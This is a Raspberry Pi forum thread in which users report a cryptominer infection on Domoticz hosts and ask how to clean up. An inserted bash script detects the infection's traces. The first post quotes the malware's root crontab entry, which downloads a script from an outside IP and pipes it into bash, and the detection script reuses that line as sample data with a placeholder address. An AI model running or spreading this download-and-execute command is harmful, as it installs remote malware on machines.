Martial
Posts: 3
Joined: Thu Jun 13, 2019 7:11 am

Virus or not ?

Thu Jun 13, 2019 7:23 am

Hi,
I use 2 rpi (one rpi3B and 1 rpi2b) with raspbian and domoticz.
On the rpi3, I had this problem:
- messages
ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
- in root crontab
* * * * * (curl -s http://107.173.102.59/mr.sh||wget -q -O - http://107.173.102.59/mr.sh)|bash -sh

I have done a restore, changed pi and root password, closed NAT rules from my box (public 8080 --> 80: domoticz, 1194: openvpn).
And the problem seems to be fixed.

Do you know this attack?
What can I do before reopening the ports?
Thank you for your help
Martial
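
The two indicators quoted above (a root crontab line that pipes a curl/wget download into a shell, and an /etc/ld.so.preload entry for a library that does not exist) can be checked for with a short script. This is an added example, not code from the thread; the sample crontab and preload data are constructed, with 203.0.113.5 as a placeholder address.

```bash
#!/usr/bin/env bash
# Added triage helpers (not from the thread) for the two persistence
# mechanisms shown in the post: a crontab line that fetches a remote script
# with curl/wget and pipes it into a shell, and an /etc/ld.so.preload entry
# pointing at a library that is missing on disk. Sample data is constructed.

# Print crontab lines that pipe a curl/wget download into a shell.
# Reads crontab text on stdin. Returns 0 if any line matched, 1 otherwise.
suspicious_cron_lines() {
    grep -E '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh'
}

# Report ld.so.preload entries that are missing on disk (the cause of the
# "cannot be preloaded" error) or that live outside /lib and /usr/lib.
# Reads the preload file on stdin. Returns 0 if anything was flagged.
audit_preload() {
    local flagged=1 lib
    while IFS= read -r lib; do
        case "$lib" in ''|'#'*) continue ;; esac   # skip blanks and comments
        if [ ! -e "$lib" ]; then
            printf 'MISSING %s\n' "$lib"; flagged=0
            continue
        fi
        case "$lib" in
            /lib/*|/usr/lib/*) ;;                     # packaged library paths
            *) printf 'UNEXPECTED %s\n' "$lib"; flagged=0 ;;
        esac
    done
    return "$flagged"
}

# Run both checks against constructed sample data (placeholder IP 203.0.113.5).
demo() {
    printf '%s\n' \
        '0 5 * * * /usr/bin/apt update' \
        '* * * * * (curl -s http://203.0.113.5/mr.sh||wget -q -O - http://203.0.113.5/mr.sh)|bash -sh' \
        | suspicious_cron_lines
    printf '/usr/local/lib/libkk.so\n' | audit_preload
}

# Against the live host (root is needed to read root's crontab):
#   sudo crontab -l | suspicious_cron_lines
#   sudo cat /etc/ld.so.preload | audit_preload
```

A non-empty /etc/ld.so.preload is unusual on a stock Raspbian install, so any entry it reports deserves a look even when the file exists.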

jamesh
Raspberry Pi Engineer & Forum Moderator
Posts: 22064
Joined: Sat Jul 30, 2011 7:41 pm

Re: Virus or not ?

Thu Jun 13, 2019 8:43 am

Principal Software Engineer at Raspberry Pi (Trading) Ltd.
Contrary to popular belief, humorous signatures are allowed. Here's an example...
"My grief counseller just died, luckily, he was so good, I didn't care."

rutgercjonaker
Posts: 1
Joined: Thu Jun 13, 2019 10:48 am

Re: Virus or not ?

Thu Jun 13, 2019 10:54 am

I have also got it. :shock:
Is it "mr.sh"?
I have tried removing some temp files but no luck.
Anyone know how to remove it without going back to an old backup?

jamesh
Raspberry Pi Engineer & Forum Moderator
Posts: 22064
Joined: Sat Jul 30, 2011 7:41 pm

Re: Virus or not ?

Thu Jun 13, 2019 11:22 am

https://discourse.nodered.org/t/cryptom ... rvers/3454

Reformat the SD card and ensure you follow sensible security policies when opening a device to the internet.

Martial
Posts: 3
Joined: Thu Jun 13, 2019 7:11 am

Re: Virus or not ?

Fri Jun 14, 2019 8:53 am

Thank you Jamesh,
Do you know the most likely door they used to enter?
The web server of domoticz?
openvpn?
I had already changed the passwords of root and pi. Can I find a trace in a system log of their entry into my system?

Regards

jamesh
Raspberry Pi Engineer & Forum Moderator
Posts: 22064
Joined: Sat Jul 30, 2011 7:41 pm

Re: Virus or not ?

Fri Jun 14, 2019 9:12 am

Martial wrote:
Fri Jun 14, 2019 8:53 am
Thank you Jamesh,
Do you know the most likely door they used to enter?
The web server of domoticz?
openvpn?
I had already changed the passwords of root and pi. Can I find a trace in a system log of their entry into my system?

Regards
I have no idea. Sorry.

SouD
Posts: 1
Joined: Mon Jun 17, 2019 7:23 pm

Re: Virus or not ?

Mon Jun 17, 2019 7:34 pm

Hi guys,
I got the same crypto malware / virus.

I deleted all cron entries and temporary folders and blocked all ports / IPs, but it still persists.
It stopped for a few days but came back (I'm tracking it with Wireshark).

I'm going to reinstall all the system one more time...
Martial, can you tell me if your system was hacked again right after the reinstall?
Can I reconfigure the Pi for the XXXXXXXth time with peace of mind? Or should I pray for my IP not to be listed on a wrong list?

BTW I'm using the Raspberry for octoprint / openvpn / domoticz only. I have internet access to domoticz for a personal project :/
I suspect domoticz...

SouD

Martial
Posts: 3
Joined: Thu Jun 13, 2019 7:11 am

Re: Virus or not ?

Tue Jun 18, 2019 7:44 am

SouD wrote:
Mon Jun 17, 2019 7:34 pm

Martial, can you tell me if your system was hacked again right after the reinstall?
Can I reconfigure the Pi for the XXXXXXXth time with peace of mind? Or should I pray for my IP not to be listed on a wrong list?
SouD
Hi,
I have not reinstalled the system; I used a clone of my SD card which, luckily, was only a few hours old and without the virus.

I have not reopened the NAT rules; I am looking to secure all that beforehand.
Martial
